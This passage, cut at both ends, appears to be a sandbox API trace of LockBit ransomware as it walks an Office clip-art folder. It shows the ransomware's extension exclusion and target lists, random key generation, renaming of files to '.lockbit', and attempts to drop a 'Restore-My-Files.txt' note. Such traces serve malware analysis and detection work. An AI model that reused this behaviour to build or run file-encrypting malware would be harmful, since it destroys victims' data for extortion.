lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0122.457] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0122.457] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099171.WMF") returned 1 [0122.458] lstrcmpiW (lpString1="ntldr", lpString2="J0099171.WMF") returned 1 [0122.458] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099171.WMF") returned 1 [0122.458] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099171.WMF") returned -1 [0122.458] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099171.WMF") returned -1 [0122.458] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099171.WMF") returned 1 [0122.458] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099171.WMF") returned -1 [0122.458] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0122.458] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned=".WMF" [0122.458] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0122.458] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0122.458] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0122.459] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0122.459] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF.lockbit") returned 72 [0122.459] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099171.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0122.460] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0122.460] malloc (_Size=0x40068) returned 0x3df0008 [0122.460] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8754) returned 1 [0122.460] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.461] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0122.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0122.462] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.468] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0122.468] malloc (_Size=0xa6) returned 0x77d7a8 [0122.468] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0122.472] free (_Block=0x77d7a8) [0122.472] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0122.472] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0122.473] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0122.473] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0xe392, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099172.WMF", cAlternateFileName="")) returned 1 [0122.473] lstrcmpiW (lpString1=".", lpString2="J0099172.WMF") returned -1 [0122.473] lstrcmpiW (lpString1="..", lpString2="J0099172.WMF") returned -1 [0122.473] PathFindExtensionW (pszPath="J0099172.WMF") returned=".WMF" [0122.473] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0122.473] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0122.474] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0122.474] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0122.475] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0122.475] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0122.475] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0122.475] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0122.475] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.475] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0122.475] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0122.475] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0122.475] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0122.475] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099172.WMF") returned 1 [0122.475] lstrcmpiW (lpString1="ntldr", lpString2="J0099172.WMF") returned 1 [0122.475] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099172.WMF") returned 1 [0122.475] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099172.WMF") returned -1 [0122.475] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099172.WMF") returned -1 [0122.475] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099172.WMF") returned 1 [0122.475] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099172.WMF") returned -1 [0122.475] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0122.475] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF") returned=".WMF" [0122.475] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0122.475] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0122.475] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0122.475] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0122.475] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0122.476] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0122.476] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF.lockbit") returned 72 [0122.477] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099172.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0122.478] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0122.478] malloc (_Size=0x40068) returned 0x3df0008 [0122.478] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=58258) returned 1 [0122.478] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.479] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.479] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0122.479] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.479] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.480] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0122.480] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.488] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0122.488] malloc (_Size=0xa6) returned 0x77d7a8 [0122.488] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0122.504] free (_Block=0x77d7a8) [0122.504] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0122.504] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0122.504] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0122.504] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x9114, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099173.WMF", cAlternateFileName="")) returned 1 [0122.504] lstrcmpiW (lpString1=".", lpString2="J0099173.WMF") returned -1 [0122.504] lstrcmpiW (lpString1="..", lpString2="J0099173.WMF") returned -1 [0122.504] PathFindExtensionW (pszPath="J0099173.WMF") returned=".WMF" [0122.504] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0122.504] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0122.504] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0122.504] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0122.504] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0122.504] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0122.505] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0122.505] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0122.506] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099173.WMF") returned 1 [0122.506] lstrcmpiW (lpString1="ntldr", lpString2="J0099173.WMF") returned 1 [0122.506] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099173.WMF") returned 1 [0122.506] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099173.WMF") returned -1 [0122.506] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099173.WMF") returned -1 [0122.506] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099173.WMF") returned 1 [0122.507] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099173.WMF") returned -1 [0122.507] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0122.507] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned=".WMF" [0122.507] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0122.507] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0122.507] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0122.508] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0122.508] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0122.508] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0122.508] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0122.508] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0122.508] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0122.508] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0122.508] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0122.508] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF.lockbit") returned 72 [0122.508] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099173.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0122.509] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0122.509] malloc (_Size=0x40068) returned 0x3df0008 [0122.509] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=37140) returned 